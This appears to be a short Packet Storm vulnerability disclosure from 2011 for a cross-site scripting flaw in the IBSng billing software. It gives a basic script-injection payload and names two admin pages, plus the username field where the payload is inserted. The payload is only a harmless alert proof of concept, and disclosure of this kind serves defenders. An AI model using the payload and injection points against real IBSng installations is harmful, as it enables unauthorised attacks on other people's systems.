IBSng B1.34(T96) Cross Site Scripting

2011-07-13T00:00:00
ID PACKETSTORM:103016
Type packetstorm
Reporter nImaarek
Modified 2011-07-13T00:00:00

Description

                                        
                                            `# Exploit Title: [XSS vulnerabilitiy in IBSng]  
# Date: [12-07-2011]  
# Author: [nImaarek]  
# Software Link: [http://sourceforge.net/projects/ibs/]  
# Version: [B1.34(T96)]  
# Tested on: [CentsOs 5.5]  
# Home : Pentesters.ir | sepehr-team.org  
  
~ (Exploit) ~  
  
~ ("><script>alert('xss')</script>) ~  
  
1 . http://<=- Domain -=>/IBSng/admin/user/search_user.php  
  
2 . http://<=- Domain -=>/IBSng/admin/mc/send_new_message.php  
Please put the xss code in the To(UserName)  
`